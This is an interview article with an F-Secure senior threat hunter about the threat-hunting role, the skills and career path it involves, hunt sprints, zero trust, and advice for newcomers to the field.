Cyber-threat actors are becoming increasingly sophisticated and innovative in their methods to evade cybersecurity tools. Therefore, simply waiting for attacks to occur and trying to fend them off is insufficient. Instead, traditional cyber-defensive strategies based on known threats need to be combined with an ability to proactively identify new and emerging attack pathways before it’s too late.
This need has led to the rise in a relatively new type of cybersecurity role – the threat hunter. These individuals are tasked with discovering potential dangers to an organization and bolstering security before any damage is caused. In essence, they need to think like an attacker and have deep insights into emerging cyber-attack trends.
So, what does it take to succeed in the world of threat-hunting, and what is life like on the front-line of the war against adversaries? Infosecurity recently spoke to Connor Morley, senior threat hunter at F-Secure, to find out.
What is a threat hunter, and what are their key duties?
A threat hunter works to defend estates and networks by understanding how they might be attacked. By thinking and behaving like an attacker, hunters actively engage in defense by understanding potential offensive attack paths. Once potential avenues of attack are discovered, defenders can mitigate them.
There is no better method of detection than a threat hunting team. When you hear about cyber-criminals lingering in a network for months and years, that’s probably because they didn’t have a team of hunters. A good threat-hunting team can detect breaches in hours or even minutes.
What inspired you to become a threat hunter, and how did you end up working in this role?
I’ve been a threat hunter for four years. I'm an avid security research investigator and almost fanatical about reading up and staying on top of the latest threats. I love to pick apart advanced techniques and see how they work so that we can tailor our detection and response.
I was a teenager when I began exploring computers, working my way around the CMD command or writing batch files, VBScripts and similar things. It was very low-tech but foundational because it showed me how computers worked.
I studied Computer Security and Forensics at university, focusing on offensive techniques and forensics analysis as well as penetration testing, enterprise server management and more. I graduated with a First-Class Honours degree and was given the opportunity to complete a doctorate at the University. However, after I started looking for a job, I was contacted about a possible position at F-Secure's Countercept department to do research-led active defense. Now I’m a senior threat-hunter.
What are the key skills and attributes required to work in this area?
Many threat hunters start their career by earning an Offensive Security Certified Professional (OSCP) qualification, which gives them a basic understanding of offensive security. But the job requires us to take a giant step beyond anything that can be taught in the classroom. We must develop an attacker mindset that involves understanding the questions hackers ask and the answers they are likely to discover. It involves looking at an application and working out if it can be misused or made to do something it is not supposed to do.
The title of threat hunter barely existed just five years ago, meaning it can evoke images of comic book heroes joining forces to battle shady digital supervillains – but that’s not the case. Threat actors are creative and persistent, which means threat hunters are forced to live by a philosophy that states that attacks are inevitable, and all preventative measures will eventually fail, so threat hunting works more on the detective side.
This can be done by creating standard rules and toolsets that detect malicious behavior or by looking for threat actions that are often called hunt sprints or use cases. Threat hunters devise hunt sprints that expose both indicators of compromise (IOC) and indicators of attack (IOA) based on new or emerging techniques and exploits, as well as data gathered from active incidents or reports from out in the wild. Hunters then sweep across their clients’ estates to discover compromises based on the pre-conditions set out in the sprint. Findings are collated to create detection capabilities that pick up attackers that try to use the same technique, creating both legacy and future protection for clients.
"Hunters use response capabilities to slow down or halt an attacker and limit their activity until a fully-fledged remediation operation can be launched"
Another myth around threat hunters imagines they are constantly chasing intruders out of the network and engaging in digital hand-to-hand battles. This is not the case. Hunters use response capabilities to slow down or halt an attacker and limit their activity until a fully-fledged remediation operation can be launched. Hunters track attackers and use the intel gathered in these observations to devise obstacles such as network speed bottlenecks that give incident response teams time to expel the attacker from the system and ensure they will never get back in.
There are occasions when hunters deal with a “hands-on keyboard” attacker, which is a very dangerous situation. When an attacker spots a threat hunting team, they may suddenly change tactics to throw hunters off the scent. They may also go nuclear and cause as much mayhem as possible, which is especially likely if their goal is to do maximum damage to the organization.
How has the role of threat hunter evolved over the years, and how do you expect it to develop in the future?
The entire security industry is moving towards models like zero trust, which are tighter security frameworks. One of the primary reasons for this is the growth of internal threats, which are now one of the main factors of compromise. Employees are often used as the point of attack – or launch the attack themselves, which is particularly dangerous because they have access to the network and in-depth knowledge of an organization’s systems. This makes it harder to detect their activities.
Zero trust deems all actions untrustworthy, so there can be no activity on an estate that isn’t associated with or categorized to a particular person, making it easier to detect unauthorized activities. We’ve also seen the cybersecurity sector move away from blacklists, which get longer and more sprawling because attackers are always able to work out new ways to dodge defenses.
Threat hunters must constantly adapt to find ways of detecting methodologies that can bypass blacklists, zero trust or whitelists. The best teams will find ways to leverage these evolutions against attackers and in favor of defenders.
What advice do you have for someone interested in becoming a threat hunter?
Make sure you love research because that’s how threat hunters refine their understanding of attackers and devise new offensive – and therefore defensive – capabilities. It is also important to pay attention to detail and be willing to constantly learn. You have to combine many different skills to be a threat hunter, so you must keep developing your knowledge, testing previous assumptions and devising new ways to tackle emerging threats.